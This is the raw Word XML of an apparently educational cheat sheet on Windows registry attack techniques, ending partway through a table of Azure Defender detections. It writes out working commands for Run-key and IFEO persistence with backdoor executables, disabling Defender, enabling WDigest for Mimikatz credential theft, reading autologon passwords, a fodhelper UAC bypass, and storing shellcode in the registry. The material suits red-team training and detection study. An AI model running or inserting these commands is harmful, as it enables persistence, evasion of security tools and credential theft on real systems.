    </w:p>
    <w:p w14:paraId="57061DC2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence (Auto-Start Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B08188" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>Attackers can modify registry keys to execute payloads on boot or login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E660105" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧬</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Common Run Keys (Userland Persistence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A41E2A7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t># HKCU - Current User (less privileged)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA0DF3B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Updater /t REG_SZ /d "C:\Users\User\rev.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A0CDF8" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="1E0AA6E5" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t># HKLM - All Users (requires admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B16627" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:t>SystemUpdater</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve"> /t REG_SZ /d "C:\Windows\system32\backdoor.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A89A2B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">These run every time the user logs in. Common for </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse shells</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C2 beacons</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702F3FB5" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="1502C371">
          <v:rect id="_x0000_i1052" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FABE5A8" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Disable Defender / Security Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6096553E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛑</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Turn off Defender via Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025104FE" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7939331A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>May trigger alerts in Azure Defender or Microsoft Defender for Endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226A5A72" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="2610910E">
          <v:rect id="_x0000_i1053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="651C847B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🕵️</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Theft: LSASS &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autologon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="12133DF3" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">▪ Enable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WDigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (plaintext creds in memory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073C4FE6" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>reg add HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:t>SecurityProviders</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:t>WDigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve"> /v </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:t>UseLogonCredential</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve"> /t REG_DWORD /d 1 /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD1DC02" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">Allows tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve"> to extract cleartext credentials from memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F20E12" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">▪ Extract </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AutoLogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01129E1D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42485C48" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">Look for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:t>DefaultUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:t>DefaultPassword</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:t>AutoAdminLogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D091444" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="6499991B">
          <v:rect id="_x0000_i1054" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="105B5F67" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎭</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation (UAC Bypass)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C67BF12" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">Attackers can exploit </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UAC bypass techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve"> by modifying Registry keys that control how binaries are executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5319E869" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>▪ Example: Fodhelper.exe UAC Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F5D9F1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "C:\Temp\rev.exe" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6A534" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>reg add "HKCU\Software\Classes\ms-settings\shell\open\command" /v "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:t>DelegateExecute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t>" /f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEC8DA3" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>fodhelper.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34028693" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">This launches the payload with </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>auto-elevated privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF17F81" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="73938489">
          <v:rect id="_x0000_i1055" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB56A5A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧬</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DLL Hijacking via App Paths or Image File Execution Options (IFEO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BDED84" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>▪ Persistence or Redirection using IFEO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314DAD3B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /t REG_SZ /d "C:\backdoor.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFB86D4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>Launching notepad.exe will execute the attacker's payload instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B70370D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="7D5072E7">
          <v:rect id="_x0000_i1056" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFCC4DE" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>📁</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Hide Payloads or Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1935A4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">Store encoded payloads in the registry to be retrieved later (also known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fileless persistence</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682BA8DF" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>▪ Example (using PowerShell):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFA5A1C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t>Set-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:t>ItemProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve"> -Path "HKCU:\Software\Microsoft\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00015685">
        <w:t>MyPayload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00015685">
        <w:t>" -Name "Code" -Value "Base64EncodedShellcode"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385FE1FA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00015685">
        <w:t xml:space="preserve">Later retrieved and decoded for </w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>in-memory execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516D0CC2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="125500EE">
          <v:rect id="_x0000_i1057" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F5F9E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🚩</w:t>
      </w:r>
      <w:r w:rsidRPr="00015685">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Detection Considerations in Azure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508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="0CF15C3F" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A5414E1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015685">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26B1C578" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00015685">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defender Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="0FDD5832" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="226C9396" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Registry autoruns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A66ABE6" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Suspicious Registry Modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="5B452414" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="398D2E23" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Defender disable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="782FC27D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00015685" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00015685">
              <w:t>Tamper Protection Alert</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00015685" w14:paraId="27560A1D" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
